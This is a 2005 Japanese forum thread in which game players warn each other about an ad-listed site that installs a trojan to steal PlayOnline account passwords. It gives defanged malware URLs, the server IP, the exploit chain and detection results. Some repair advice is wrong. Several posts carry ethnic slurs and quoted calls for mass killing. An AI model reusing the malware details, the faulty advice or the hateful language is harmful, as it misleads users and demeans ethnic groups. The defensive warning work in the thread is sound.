>>31の1番上のURLにもウィルスあったぞ。。。

152既にその名前は使われています:2005/10/22(土) 08:47:50 ID:/gUzJZIo
ガイシュツかもしれんが
ここでもこのサイト取り上げられてる
ttp://vegalv50.nyx.bne.jp/misc/security/?id=case-site
どうも同じドメインでリネ2も狙ってるらしい
153既にその名前は使われています:2005/10/22(土) 08:52:15 ID:r82/ZgkF
バイナリスキャンのやつに、FTPのパスっぽいのがあるな。
154151:2005/10/22(土) 09:03:25 ID:nfhOzZqw
ウイルスはないってかいてあったから踏んだのがやばかったのか、ノートン先生なにも反応せず寝て起きたら見事にトロイひっかかってた( ´Д⊂ヽウェェェン

前のレスにあったAnitiVirを使って今検出してる・・・
155既にその名前は使われています:2005/10/22(土) 09:17:02 ID:vT9yLE/z
有益スレage
156既にその名前は使われています:2005/10/22(土) 09:19:11 ID:1Q/+Jvf9
無欲の勝利
157既にその名前は使われています:2005/10/22(土) 09:34:49 ID:jgejC4y/
>>151
だからいつ罠ポイントが移動するか分からんと追記してあるだろうに…
好奇心は猫をも殺すのいい見本だ。
パクリサイト見に行っても損はあれど得は無いぞ。
158既にその名前は使われています:2005/10/22(土) 09:41:13 ID:kC9eR/YX
おい、誰か件の公式掲示板とやらにスレ立てしてくれ。
それと、中国からのアクセスは問答無用でフィルタするよう提案してくれ。
マジ中華むかつく。中国出張のヤツはFFできなくなっても仕方ないだろ。

何故かあそこ、メルアド・パスワード登録できないんだよな。
159既にその名前は使われています:2005/10/22(土) 10:03:54 ID:TkLcIF7r
超あげ
160既にその名前は使われています:2005/10/22(土) 10:05:17 ID:L9+xI10L

数年前までは、ノートン先生は信頼できたけど
最近はダメダメ。
とくに、スパイウウェア系を長年スルーしてきたツケを払うことになると思う。
最近スパイウウェアとウィルスの定義があいまいで
悪質なのが多い、なのに、ノートン先生はスパイウェアにはノータッチの姿勢だったし。
最近は少しがんばってるが、更新料金の値上げとか、意味不明なことやってるし・・・。
そろそろ見限り時かもしれん。
161既にその名前は使われています:2005/10/22(土) 10:08:37 ID:TkLcIF7r
2ちゃんにこないFFユーザーにも分かるように
プレミアサイトに張る必要あるのかな?

でも私はウィルス知識ないから真偽わからんし
162既にその名前は使われています:2005/10/22(土) 10:13:35 ID:o0rPUyrj
ちょまてて、どうやって消すんだ?教えてくれ
リネ2の方踏んじまったよwww
163既にその名前は使われています:2005/10/22(土) 10:55:14 ID:GzJJ5qrJ
おはにゃ〜
 応援あげにゃ〜
164151:2005/10/22(土) 10:58:41 ID:PFu1DkMG
>>162

とりあえず>>24をみたらいいとおもふ
165既にその名前は使われています:2005/10/22(土) 10:59:37 ID:TkLcIF7r
AntiVirインスコしてから例のサイトいったら
見事に反応した。
166既にその名前は使われています:2005/10/22(土) 11:08:38 ID:a2P74KW8
PlayOnline自体がローカルメモリ上にIDとパスが暗号化なしで展開される謎仕様

FF中にシャウトさせるプログラムなんて簡単にできるよ。つーかできたw
167既にその名前は使われています:2005/10/22(土) 11:13:22 ID:OAh2NhGM
age
168既にその名前は使われています:2005/10/22(土) 11:29:36 ID:PgEszdCn
超age!
1691:2005/10/22(土) 11:34:27 ID:JJGQG3Ek
■<おはようポマイら。たくさん神が降臨しててたいへん嬉しい。
170既にその名前は使われています:2005/10/22(土) 11:35:05 ID:Dq3FzPQl
【FFXI】特定アジアの真実:6ヵ国目【FFXI】

enjoykorea日韓翻訳掲示板ログより。

timethisso : 韓 - これだけ言いなさい. 在日たちが韓国に何が役に立つか? どうせ日本
人だ. 敢えて在日という名前で生きて行く理由は何か? 彼らはそのままごみであるだけ
jap0 : 韓 - 在日は, 韓国の名前を売り込んで日本に寄生している. 虫以下.
timethisso : 韓 - yorke>>お前も帰化したの? 構わない. 在日は全部消えなければなら
ない. 全部死になさい. 汚い日本と言う(のは)国に在日と言う(のは)名前がいると言うの
が恥ずかしい.
jap0 : 韓 - 税金恩恵を受けて, もうちょっと他人達より富裕に暮したい便法を使って
いるのだけ, チョクバリと違いない. 韓国の名前を売らないでね.
timethisso : 韓 - 正直在日に気にならない. 日本に住む韓国人がいると言うのが恥ずか
しい. 今すぐ皆殺しでもさせたい.訳もなく韓国名前を売り込む犬日本人とまったく同じだ.
日本に住んだから心が汚くて醜悪だ日本に住む韓国人がいると言うのが恥ずかしい. 今す
ぐ皆殺しでもさせたい.

http://live19.2ch.net/test/read.cgi/ogame/1129819622/l50
171既にその名前は使われています:2005/10/22(土) 11:39:35 ID:me9IUg4u
あーこれな、確かにヤヴァイわコレ。
私はキャッシュから見て、ウィルス仕込まれてないページ
だったけど、不用意に踏むと、ちょっとマズイと思う。
電話番号からして、関西方面だな…普通は載せないし怪しすぎる。
つか、ドメイン名からしてヤヴァス(IPドメインSEARCHで検索汁)。

感染すると、パスとかクラックされて…そんなのある訳ないじゃんw
とか思ってる人は、そういうウィルスもあるってことを
知っておいた方が良いと思うよ。

最近流行ってる罠ツール、支那が日本人に使わせないように
仕込んだと見て、間違いないな・・・必死過ぎて笑えんわィ。
172既にその名前は使われています:2005/10/22(土) 11:42:34 ID:cLg675CJ
優良スレ
173既にその名前は使われています:2005/10/22(土) 11:44:32 ID:me9IUg4u
ノートンじゃ検出されないヤツか・・・地に落ちたもんだ。
元々、Avastとかの方が軽い上に優れてる印象はあったがなw
174既にその名前は使われています:2005/10/22(土) 11:50:59 ID:B65TW0WT
学生やらは休日に災難だったな。ご愁傷様。オチしてニヤニヤさせて貰います
175既にその名前は使われています:2005/10/22(土) 11:52:58 ID:cLg675CJ
もひとつ仕組みがわからないのだが、
ログイン時にPassを入れるときに
Passの入力を引き抜かれるということ?
→これだとPC版でログインしたときに引き抜かれる
それともPassを自動入力にしてると
そのデータを引き抜かれる?
→これだとそこのHPにアクセスして感染した時点でヤバイことに…

どっちにしてもPassを定期的に変更しないとだめぽいね。
176既にその名前は使われています:2005/10/22(土) 11:53:12 ID:7oKhOBAg
そんなにやばいのかwwwwwwwwwwww

生暖かくオチさせてもらうか
177既にその名前は使われています:2005/10/22(土) 11:58:59 ID:UVSbd4iL
なんか最近ノートンは本当にダメだな
178既にその名前は使われています:2005/10/22(土) 12:01:12 ID:cLg675CJ
これって、まじで怖いな。
【????????】【させてくれませんか?】50.000G
シャウトはツールだったけど、
これも勝手に入れちゃおうとすれば入れれる訳だよね?
ツールの場合は犯罪にはならないけど、こっちは犯罪になる。
だけど無法地帯のシナ発だと…(;´ρ`)
179151:2005/10/22(土) 12:05:47 ID:pl/0ifAQ
avast起動したら

DCOM exploitからのの攻撃を遮断しました

ってでるんだけどこれってなんじゃらほい?
もしかして感染したトロイのやつかなぁ?(´・ω・)

180既にその名前は使われています:2005/10/22(土) 12:11:42 ID:UVSbd4iL
そりゃスパイウェアの方じゃないか?
まあ誰しも一匹や二匹気付かずに飼ってたりするもんだが・・・・。
181既にその名前は使われています:2005/10/22(土) 12:12:00 ID:/WKuLNq9
jigで見てみたけど、内容薄いサイトだな

BBSにも記念カキコしてきたお
182151:2005/10/22(土) 12:13:34 ID:pl/0ifAQ
>>180

さんくす (・ω・)ノ
183既にその名前は使われています:2005/10/22(土) 12:14:10 ID:yCMQgLZD
さっさと■に通報してやるべきでは?
1841:2005/10/22(土) 12:15:57 ID:JJGQG3Ek
■<スレたての責任取って神たちのカキコをまとめた。

漏れてる有益情報あったら盛り込みヨロ。

---
【POL垢盗む?】絶対踏むな!【中華サイト】
---
PlayOnlineのアカウント情報を窃取するために作られたと思われるWebサイトが
見つかった。Yahoo! JAPANやMSNで"FF11"をキーワードに検索したときにスポン
サーサイトとして表示される「花の雫FF11情報局」がそれだ。このサイトは中国
に設置されており、アクセスするとWindowsのセキュリティホールを突いてPOLの
アカウント/パスワードを盗むトロイの木馬プログラムが実行される可能性がある。

罠を仕込んだ中華サイトのURLは、http://www●japan213●com/と
http://www●1102213●com/だ(事故アクセス防止のためドットをデカくしてある)。
いずれのサイトもIPアドレスは同じで211.100.26.182(割り当ては中国)。
これらのサイト内にあるページはいつ罠入りのものに差し替えられるか分からない
ので不用意にアクセスしないようにしてほしい。

1851:2005/10/22(土) 12:16:39 ID:JJGQG3Ek
【想定シナリオ】(前スレ >>32
1. 中華 罠サイト作成 トロイ入りで踏むとPOLパスワードを抜く様に作る。コンテンツはパクり。(*1)
2. 中華 罠サイトのURLをYahoo!とMSNに広告として出稿。(*2)
3. FF11プレイヤー、Yahoo!とかMSNでFF11ワードで検索して罠サイト踏む
4. FF11プレイヤー、ある日ログインしたらキャラが消えてる。持ってた装備は中華によりRMTの餌食に。

(*1)
創作小説
http://ff11-free.sakura.ne.jp/i/nove/00-00.html
http://www●japan213●com/suo●htm
防具
http://homepage3.nifty.com/~ffxi/Shield.html
http://www●japan213●com/fang●htm

(2)
http://www.yahoo.co.jp
http://www.msn.co.jp
で、検索ワード「FF11」すれば見つかる。
1861:2005/10/22(土) 12:17:20 ID:JJGQG3Ek
【仕込まれるウィルスの解析】
http://www●1102213●com/ff11help/money.htmにはWindowsのHTML HELPの
脆弱性(MS05-026あたりかな)を突くスクリプトが仕込まれている。これに
よってicyfox.chmという変造HTMLヘルプが実行されて、
http://www●1102213●com/ff11help/svchost.exeがダウンロード、実行さ
れる。これがパスワードを抜くトロイ本体。Norton AntiVirus 2005は無反
応だったけど、UPXによる圧縮を解いてバイナリファイルをのぞいたら怪し
げな文字列がたくさん見つかった。
www.japan213.com = www.1102213.com = 211.100.26.182(中国)

1871:2005/10/22(土) 12:17:40 ID:JJGQG3Ek
【ウィルス内部に見つかったキーワード】
・usr\all\login_w.bin
→ C:\Program Files\PlayOnline\SQUARE\PlayOnlineViewer\usr\all\login_w.bin
というファイルあり。PlayOnlineのパスワード保存用?もしくはこのファイルにキーロガー
仕込まれる?

・pol.exe

・c:\gameff11.txt
→ 感染するとこのファイルが生成される?
1881:2005/10/22(土) 12:17:59 ID:JJGQG3Ek
【各ウィルス対策ソフトでの対応状況】
Norton AntiVirus 2005: 検出不可
Norton Internet Security 2005: 検出不可
ウイルスバスター: 検出不可
Avast!: 「Win32:Mhtplo-31」として検出
AntiVir: 「TR/Copiet.B.1」として検出。

1891:2005/10/22(土) 12:18:16 ID:JJGQG3Ek
【ウィルスバスタ2005での対策】
1.メイン画面を起動し、左の縦に並んだメニューの「パーソナルファイアウォール」をクリック
2.右の「パーソナルファイアウォール設定」をクリック
3.「パーソナルファイアウォオールを有効にする」にチェックが入っている事を確認
4.「プロファイルの編集」枠のプロファイル名に丸印が付いている列をクリック
5.鉛筆マークの編集アイコンをクリック
6.「プロファイルの設定」画面が開くので、「除外リスト」タブのプラスマークの「追加」ボタンをクリック
7.「除外リストの追加/編集」画面が開くので以下を設定
 ・説明 「FF罠サイト」に変更
 ・対象 すべてのアプリケーション
 ・接続 受信
 ・アクセス処理 拒否
 ・プロトコル すべて
 ・ポート すべてのポート
 ・種類 IPアドレス
 ・ホスト名 空白
 ・IPアドレス 211  100  26  182
9.OKをクリック。同様に送信も拒否(7の設定内容で「接続」を「送信」で)
190既にその名前は使われています:2005/10/22(土) 12:19:14 ID:LHscrs5i
>>1さん
注意を促す目的で、まとめ情報を私のサイトに転載しても良いでしょうか?
1911:2005/10/22(土) 12:20:40 ID:JJGQG3Ek
以上まとめ。
>>184-189

あああう。連投規制ウザス!!


>>190
是非お願いします。
192既にその名前は使われています:2005/10/22(土) 12:22:11 ID:PgEszdCn
>>1さんGJ!
応援&注意喚起age
193既にその名前は使われています:2005/10/22(土) 12:22:59 ID:LHscrs5i
>>191
ありがとうございます。
1941:2005/10/22(土) 12:24:22 ID:JJGQG3Ek
と言う訳でなんとなくネ実レベルではお知らせ出来た感じだし、
名無しに戻ります。

みんな、ありがとう。
大きな事件にならないといいのだけど。
195既にその名前は使われています:2005/10/22(土) 12:24:27 ID:da6J9STM
ナニコレ・・・

みんな>>1に騙されてるwww
196既にその名前は使われています:2005/10/22(土) 12:24:40 ID:JxYQ0ETi
elemenあたりにのせてくれねえかなあ
入り口がヤフーMSNであんま詳しくないヤツほどひっかかりそうだ。
197既にその名前は使われています:2005/10/22(土) 12:26:19 ID:QEznAm2U
>>188
Trojan-PSW.Win32.Lineage.hn
Other versions: .by, .ha
Aliases
Trojan-PSW.Win32.Lineage.hn (Kaspersky Lab) is also known as: PWS-Lineage (McAfee),
PWSteal.Lineage (Symantec), Trojan.PWS.Lineage (Doctor Web),
TSPY_LINEAGE.EN (Trend Micro), TR/Copiet.B.1 (H+BEDV), Trojan.Spy.Lineage-15 (ClamAV),
rj/Lineage.HQ (Panda)
Detection added Jun 24 2005
Behavior PSW Trojan

リネージュのパス抜くやつかね
198既にその名前は使われています:2005/10/22(土) 12:27:42 ID:S4CLSl4m
ウイルスって言うよりはトロイじゃないの?
199既にその名前は使われています:2005/10/22(土) 12:27:59 ID:ubSjts0/
作った奴逮捕されるのまだー?
200既にその名前は使われています:2005/10/22(土) 12:28:19 ID:QEznAm2U
PWSteal.Lineage (Symantec)
http://www.norton.com/region/jp/avcenter/venc/data/jp-pwsteal.lineage.html

これの改変でFFパスを抜くようにしてあるのかな
201既にその名前は使われています:2005/10/22(土) 12:28:40 ID:ukNeaBAR
つか、■eも早く公式に情報喚起するなり、システムメッセージなりの注意を促せよな
202既にその名前は使われています:2005/10/22(土) 12:28:55 ID:DF9/SXkR
ctrl+alt+del押してみたら
svchost.exeが3つも起動中だよ(((( ;゚Д゚)))
203既にその名前は使われています:2005/10/22(土) 12:29:35 ID:TkLcIF7r
>>198
別に区別する必要ないでしょ
トロイと書くより
ウィルスと書いたほうが初心者に伝わりやすいし。
204既にその名前は使われています:2005/10/22(土) 12:30:27 ID:S4CLSl4m
>>203
そうか・・・それはあるか
205既にその名前は使われています:2005/10/22(土) 12:30:56 ID:c+fel1gV
>>202
全部消せ、今すぐ消せ
206既にその名前は使われています:2005/10/22(土) 12:31:43 ID:29AoP5D5
>>199
中華じゃないのか?

日本で作成したサイトなん?
207既にその名前は使われています:2005/10/22(土) 12:32:30 ID:Czw9CIFm
俺FF11やってないLineageプレイヤーだけど、
罠サイトはリネでもあったよ。
支那運営のRMTサイトに始まり、日本人運営の情報サイトに埋め込んだり、
しまいには、価格コムにハッキングしてスパイウェア埋め込んでた
それで、実際にハックされてアイテム全部取られた知り合いいたしな。
それを機会に支那に甘かったリネ運営のNCJが重い腰を上げて、
支那をどんどんBANしている。
ただ、支那人はどうせBANされるならとハッキングが激しくなってきてる状況。
FF11プレイヤーや特に情報サイト運営してる人は埋め込まれてないか気をつけたほうがいいよ
208既にその名前は使われています:2005/10/22(土) 12:32:41 ID:shaj7kiA
yahooとかでFF11検索しても出ないんだけど、どこ?
209既にその名前は使われています:2005/10/22(土) 12:34:15 ID:5r/C3vY4
質問:svchost.exe ってなんですか?

ttp://oshiete1.goo.ne.jp/kotaeru.php3?q=698358
210既にその名前は使われています:2005/10/22(土) 12:35:06 ID:JJGQG3Ek
>>208
無くなってる。
昨日の時点では広告が2個ずつあって、そのかたっぽが
罠サイトだった。
211既にその名前は使われています:2005/10/22(土) 12:36:21 ID:shaj7kiA
>>210
なるほどサンクス
212既にその名前は使われています:2005/10/22(土) 12:38:50 ID:O+YkoZIp
svchost.exeは正常なやつもあるから
間違えて消すなよ
213既にその名前は使われています:2005/10/22(土) 12:39:09 ID:3LObFl3u
svchost.exe
普通に立ち上がってるdあsgfdj

これ何?まずいの??
214既にその名前は使われています:2005/10/22(土) 12:40:21 ID:UVSbd4iL
>>202
そりゃ起動してんだろうよ。
215既にその名前は使われています:2005/10/22(土) 12:40:48 ID:VkA7z13X
>>202

svchost.exeって>>51氏のレスを見る限り通常は複数起動していておかしくないんじゃない?
まぁ、偽装でsvchost.exeで潜むそうだが、偽装の見つけ方誰か教えて('A`)
216既にその名前は使われています:2005/10/22(土) 12:41:54 ID:LKJ58k4w
消しても害は無い
なんかあってからじゃ遅いから念のために消しておけ
217既にその名前は使われています:2005/10/22(土) 12:42:37 ID:29AoP5D5
>>179
それは違う
218既にその名前は使われています:2005/10/22(土) 12:42:52 ID:UVSbd4iL
そういや最近「ゲーム名 攻略」で検索すると大抵出てくる胡散臭いサイトがあるな。
219既にその名前は使われています:2005/10/22(土) 12:42:54 ID:QrtokkfC
消すと再起動することもあるぞ・・・

手動ブラスター?w
220既にその名前は使われています:2005/10/22(土) 12:43:02 ID:iPwOOtJy
自分でブラスター・・・ワロタwww
221既にその名前は使われています:2005/10/22(土) 12:44:03 ID:c+fel1gV
>>218
あるねぇ、コンシュマとかで多分広告益狙いの文字羅列したサイト
222既にその名前は使われています:2005/10/22(土) 12:45:04 ID:29AoP5D5
やはりこういう重要なのはネ実は情報早くていいな
223既にその名前は使われています:2005/10/22(土) 12:46:50 ID:59KciBTz
花の雫FF11情報局がスポンサーから消えたぞ
224既にその名前は使われています:2005/10/22(土) 12:49:02 ID:YjhmtwdE
何回リロードしてもアマゾンしか出ないし、逃げたか。

そいやぁ、whois検索に例のサイトのアドレス放り込んだら
なんか情報でないのかな?
225既にその名前は使われています:2005/10/22(土) 12:49:21 ID:4WLhu6UE
ばななに色々書いてあった
http://park11.wakwak.com/~beatnic/
226既にその名前は使われています:2005/10/22(土) 12:50:27 ID:59KciBTz
ヤフーにトロイが仕組まれたサイトがスポンサーサイトとして掲載された件について質問してみたいな
セキュリティーチェックがおろそかなんじゃないかとか
227既にその名前は使われています:2005/10/22(土) 12:53:21 ID:UVSbd4iL
>>226
ノートン先生でチェックするので件のトロイに関しては回避した。
228既にその名前は使われています:2005/10/22(土) 12:55:16 ID:YjhmtwdE
自分で放り込んでみた。電話番号とメルアドは削除の理由にされかねんから、自粛。

>Registrant:
> hagongda
> haerbin 150001
> china
> Phone: (自粛) Fax:
> Domain name: JAPAN213.COM
> Administrative Contact:
> hagongda wlmx009@(自粛)
229既にその名前は使われています:2005/10/22(土) 12:55:22 ID:LHscrs5i
>>225
宣言どおり転載しますた
230既にその名前は使われています:2005/10/22(土) 12:56:46 ID:CGtwDVR3
AVGのオレはどうすればいいですか
231既にその名前は使われています:2005/10/22(土) 13:01:29 ID:59KciBTz
てか思ったんだが結構感染してるやついるんじゃね?
232既にその名前は使われています:2005/10/22(土) 13:04:07 ID:6WLJMpJV
>>202
落ち着いてくれ。俺は5つだ(´ー`)

トロイとか気になる人はSpybotSDあたりで検査してみるのもいいと思う
Avast使ってるんだが、それでも発見できない奴とかが見つけられたりする
233既にその名前は使われています:2005/10/22(土) 13:07:08 ID:MSEzyqbT
これからこの手のサイトどんどん作られていくんだろうか・・・
うかつにリンク踏めないな
234既にその名前は使われています:2005/10/22(土) 13:07:55 ID:K0dSH8YS
大規模にキャラつぶされる予感
235既にその名前は使われています:2005/10/22(土) 13:14:13 ID:bTzOmoye
ps2でやってるから無問題
236既にその名前は使われています:2005/10/22(土) 13:15:56 ID:TkLcIF7r
装備やギルごっそり抜かれたあとキャラ削除
奪ったギルやアイテムをRMTへ

中華も自分で稼ぐよりその辺のキャラのアイテム強奪する手段のほうが
手っ取り早いとおもったのかも。
237既にその名前は使われています:2005/10/22(土) 13:16:56 ID:DM0GSJ8S
中華のギル買ってアイテム買ったやつのキャラ奪ってアイテム戻せばウマーかお!

もう中華死ぬがいいお!
238既にその名前は使われています:2005/10/22(土) 13:19:43 ID:pl/0ifAQ
中華テラキモス

ほんとクソだな
239既にその名前は使われています:2005/10/22(土) 13:20:37 ID:TbmpzNr+
>>235
いやいやPS2でも同じネット回線使ってるなら抜かれる
240既にその名前は使われています:2005/10/22(土) 13:21:00 ID:nBMPeCDQ
ちょっと今までの流れを誰か解説してクレクレ
241既にその名前は使われています:2005/10/22(土) 13:22:58 ID:CAyfBVOa
242既にその名前は使われています:2005/10/22(土) 13:24:43 ID:1QwQINo+
>>239ヤバイ!俺のバーミリがッッ
243既にその名前は使われています:2005/10/22(土) 13:25:41 ID:6WLJMpJV
>>239
史上類を見ないほどにテラオソロシス
俺のホーネットニードルがっ
244既にその名前は使われています:2005/10/22(土) 13:29:47 ID:vuAofryx
被害者は既に国センで取り上げられるくらい出てる
>>126

■の腐った対応で泣き寝入りみたいだね
245既にその名前は使われています:2005/10/22(土) 13:34:14 ID:uGvSWqHB
他のスレ上げるなぼけーーーーーーー
246既にその名前は使われています:2005/10/22(土) 13:36:10 ID:9J3Oz3Qe
>>126

俺のポポトイモがーーーっっ
247既にその名前は使われています:2005/10/22(土) 13:38:18 ID:DM0GSJ8S
スキャンしたら1個だけ key loggerが('A`)
248既にその名前は使われています:2005/10/22(土) 13:39:36 ID:nVkLQG6s
avastでスキャンかけたらノートン検出しやがったw
AVが流れてますとかどうのこうのと。
249既にその名前は使われています:2005/10/22(土) 13:44:00 ID:uEKPerKE
ノートン入っているのですが、さらにAvast入れたらまずいですかね?
250既にその名前は使われています:2005/10/22(土) 13:45:12 ID:JxYQ0ETi
>>248
やばい、おれの豊丸の無臭性動画が中華の手に;;
オソロシス;;;
251既にその名前は使われています:2005/10/22(土) 13:45:23 ID:DM0GSJ8S
ノートンを消せばいいじゃない
252既にその名前は使われています:2005/10/22(土) 13:46:14 ID:+3MThf/V
ついでにその検体を各ベンダーに送ってもらえると救われる人が増えるぞっと。

253既にその名前は使われています:2005/10/22(土) 13:47:26 ID:6WLJMpJV
アンチソフトって競合できないんじゃなかったっけ

と、さっきスパイウェア検査したら7つ出てきたエロスが言ってみる
254既にその名前は使われています:2005/10/22(土) 13:51:46 ID:TOrtJPiH
まじシナチク最悪だな。
シナとチョンがいなくなったらどれほど平和なことか・・・
お前らいつもアホみたいに国旗燃やしてる場合かっての。
255既にその名前は使われています:2005/10/22(土) 13:53:59 ID:uEKPerKE
とりあえず、ノートン切ってみました。
赤く点滅していて、気になりますが
256既にその名前は使われています:2005/10/22(土) 13:56:18 ID:+VgK/QIW
シナチクに比べると姦国なんかぜんぜんマシだなw

シナチクを軽蔑、侮辱できる最も効率的な言葉とかってない??w

ちなみに
cao ni ma
とかどういう意味だっけ?w
257既にその名前は使われています:2005/10/22(土) 13:56:57 ID:FVzMYz2x
258既にその名前は使われています:2005/10/22(土) 13:58:05 ID:gqxzBx05
>>256お前の母親を犯してやる
じゃなかったっけ?
259既にその名前は使われています:2005/10/22(土) 13:58:37 ID:rkuzWbEe
>>255
切るだけではダメ
確かアンインストしないと他の入れれないはず
260既にその名前は使われています:2005/10/22(土) 14:04:48 ID:nVkLQG6s
spybotでトロイも検出できませんか?
avastサイト英語なので更新とかやり辛いので
ノートンとspybotで凌げれば幸いなのですが
261既にその名前は使われています:2005/10/22(土) 14:06:11 ID:W+64Wkkd
>>260
スパイウェアとウィルスの違いを知ろうな

あと、SpybotよりもAd-wareのがいい
262既にその名前は使われています:2005/10/22(土) 14:13:04 ID:uEKPerKE
orz そうなのですか。259さんありがとう。
さっきから、2分に1回位の間隔で、「DCOM Exploitからのの攻撃を遮断しました」
って表示されるのですが、これって普通ですかね
263既にその名前は使われています:2005/10/22(土) 14:16:38 ID:l1Vn/Wt+
>>262
うざいなら切っておけ
「DCOM Exploitからのの攻撃を遮断しました」
ってのはほとんどスパイウェアだがたまにトロイも混じっている事もあるから注意。

ネットにつなぐだけでこんだけ危ういのがわかったならよし
264既にその名前は使われています:2005/10/22(土) 14:16:50 ID:rgMqwKnX
>>261
いや両方入れたほうがより安全。
どちらかAd-wareだけでも大体の処理ができるが
spybotはレジストリにちょっとでも怪しい文章列があっただけでも検出する。
その為、必要なものまで検出する可能性があるが
リカバリで修復可能。
265既にその名前は使われています:2005/10/22(土) 14:18:34 ID:ktM9tVGO
ノートンと>>23の共存してるよ?俺のPC 
266既にその名前は使われています:2005/10/22(土) 14:18:56 ID:l1Vn/Wt+
>>261
Spybotは免疫機能があるから楽だね。

一度引っかかったスパイウェアは自動的に遮断
267既にその名前は使われています:2005/10/22(土) 14:22:28 ID:+lMS7rMN
>>260
ここでavast日本語訳されてるのもあるよ
ttp://www.iso-g.com/
268既にその名前は使われています:2005/10/22(土) 14:25:04 ID:uEKPerKE
>263
 ありがとう。ノートンの時はこのような表示なかったからビビリました

>265
 avastですか?
269既にその名前は使われています:2005/10/22(土) 14:26:42 ID:ktM9tVGO
>>268
それそれ
270既にその名前は使われています:2005/10/22(土) 14:30:07 ID:UiqZvRQZ
PS2で3307エラーでるのはナゼ
271既にその名前は使われています:2005/10/22(土) 14:34:11 ID:uEKPerKE
>269
 私は両方起動させると、ネットに接続できなくなりますた。
 なぜだろう。。。
272既にその名前は使われています:2005/10/22(土) 14:35:44 ID:4YHM97F+
login_w.binファイルをクリックすると
POLを起動してるわけでもなく使用中だからむやみに開くな、ぽいメッセージが出るわけだが
これやばくね?
273既にその名前は使われています:2005/10/22(土) 14:44:10 ID:m9xcUzhA
>>271
FWやAVの類は排他で使うこと。
相互補完が利くのってaVast!-ZonealarmとSpybot-adAwareくらいだろ
274既にその名前は使われています:2005/10/22(土) 14:56:21 ID:rq4+rpWY
普通にWindowsUpdateしてりゃ食らわないんじゃねーの?
275既にその名前は使われています:2005/10/22(土) 14:58:47 ID:K4DSrXpI
>>274
Updateは常に後手だから必ずしも安心とは言えんな
276既にその名前は使われています:2005/10/22(土) 15:07:07 ID:lLeKpzkv
中華サイトから落としてきたニセsvchost.exeはexploreff.exeにリネームされて
C:\WINDOWS\system32にコピーされる。
さらに>>75の言うとおり、自動起動プログラムとしてレジストリに登録されて、
次回のWindows起動時に常駐する。

でも、Windows XP Pro SP2で試したら、Windowsの起動時にこんなダイアログ
ボックスが開いた。
http://tune.ache-bang.com/~vg/outitem/up/img/6177.png

デジタル署名でひっかかってやんのwww
277既にその名前は使われています:2005/10/22(土) 15:22:25 ID:hcWfWjZr
WinXPSP2を完全破壊は無理だろうな・・かなり硬い
278既にその名前は使われています:2005/10/22(土) 15:41:31 ID:DDjKwO6F
>>276
吹いたwwwwwwwwwww
279既にその名前は使われています:2005/10/22(土) 15:41:36 ID:rq4+rpWY
SP2ファイアウォールツヨスwww
280既にその名前は使われています:2005/10/22(土) 15:44:20 ID:ktM9tVGO
>>276
間抜けすぎるwwwwwww
281既にその名前は使われています:2005/10/22(土) 15:49:01 ID:eIgt6wYx
とりあえず、あげ
282既にその名前は使われています:2005/10/22(土) 15:58:21 ID:cLg675CJ
33 :1:2005/10/21(金) 22:46:02 ID:tUJ4NgNG
想定シナリオ(漏れに関する)


1. キャラ削除事件が相次ぐ

→ だから言ったじゃないか!(得意げ)

2. ナニも起きない

→ 漏れの警告のおかげでナニも起きなかったな!(得意げ)


スレ立った時点で漏れ得意げ確定。


ワロスwww
でも>>1GJ!
283既にその名前は使われています:2005/10/22(土) 16:00:16 ID:+VgK/QIW
SP2ならデジタル署名でひっかっかるだって?wwww

プークスクスwwwwwwwwwwww
間抜けにも程がある所詮シナチクwwwwwwwwwwww

ぜんぜん騒ぐほどのもんじゃないんだなw
284既にその名前は使われています:2005/10/22(土) 16:03:00 ID:rq4+rpWY
J-Word(中国製スパイウェアコンポーネント)だって署名くらい付くのにな
まぁ、明らかにやばいスパイだから足がつくとまずいわけか
285既にその名前は使われています:2005/10/22(土) 16:07:35 ID:/jYth/nU
c:にwindows入れてない俺は勝ち組
286既にその名前は使われています:2005/10/22(土) 16:10:35 ID:S4CLSl4m
とりあえずage
これはやばいだろ
287既にその名前は使われています:2005/10/22(土) 16:14:06 ID:9hmbNZIz
>>283
それでもノートン先生ならスルーしてくれる!
288既にその名前は使われています:2005/10/22(土) 16:16:44 ID:rq4+rpWY
つーか周りにJ-Wordツールバー使ってるやつ多すぎ。
日本語キーワードでどうのこうのと言ってIEに取り付くやつな。
中国大手のサーチエンジンだった3721.com
(現在はYahoo!が買収)謹製のスパイだぞありゃ。
アンインスコがすげー面倒。
289既にその名前は使われています:2005/10/22(土) 16:26:52 ID:8eruY3G3
罠サイト踏んだマシンがDDoSの踏み台にされてる可能性は?
290既にその名前は使われています:2005/10/22(土) 16:33:18 ID:rq4+rpWY
大有り
291既にその名前は使われています:2005/10/22(土) 16:34:01 ID:THsg2wy9
>289
あるあるw
292既にその名前は使われています:2005/10/22(土) 16:35:43 ID:4AIxdpiv
age推奨?
293既にその名前は使われています:2005/10/22(土) 16:39:18 ID:4wfWi8kT
推奨で
294既にその名前は使われています:2005/10/22(土) 16:39:32 ID:PgEszdCn
>>292
力強く推奨!承認!
295既にその名前は使われています:2005/10/22(土) 16:41:50 ID:DKuLuLHx
>>283
でもそれを異常、と思わない香具師が
少なからずいることが予想できるから脅威と言えば脅威
296既にその名前は使われています:2005/10/22(土) 16:41:55 ID:4AIxdpiv
マカフィー入れてるんだけど、
↑の方に出てたソフトをインストする時って、
マカフィはアンインストせんとあかんかな?

PCの事良くわからん・・・教えてエロイ人。
297既にその名前は使われています:2005/10/22(土) 16:46:11 ID:9e5+L3hT
RMTサイトとかもヤバイのありそうだな
てかむしろそっちが本拠地かも。
こんな怪しいサイトに行くやつがそんなにいるわけないし
298既にその名前は使われています:2005/10/22(土) 16:47:36 ID:hcWfWjZr
>>296
相性による。
アンチウィルスソフトには駐在と非駐在があるが
駐在同士のソフトだとソフト同士の競合により起動しないこともあるからやめておくのが吉。

スパイウェア削除ソフトはウィルスソフトと同時に入れても問題はなし。


ちなみに駐在ソフトはマカフィ、ノートン、avast!,antivir,bitdefender(課金版)等。
299既にその名前は使われています:2005/10/22(土) 16:49:39 ID:4AIxdpiv
>>298
わかりやすい説明ありがd(・ω・)
300既にその名前は使われています:2005/10/22(土) 16:51:34 ID:f5o4yghV
Jwardアンインスコメンドクサス
301既にその名前は使われています:2005/10/22(土) 16:54:35 ID:mmD/tmCj
バスターとavast、現在同時に常駐させてる。
302既にその名前は使われています:2005/10/22(土) 17:00:26 ID:loujivx+
msnとyahooでは表示されなくなってるみたいね
303既にその名前は使われています:2005/10/22(土) 17:11:40 ID:PAqjHmgm
ヒロフミとオマンコ大好きlsリスト (蹴鯖)

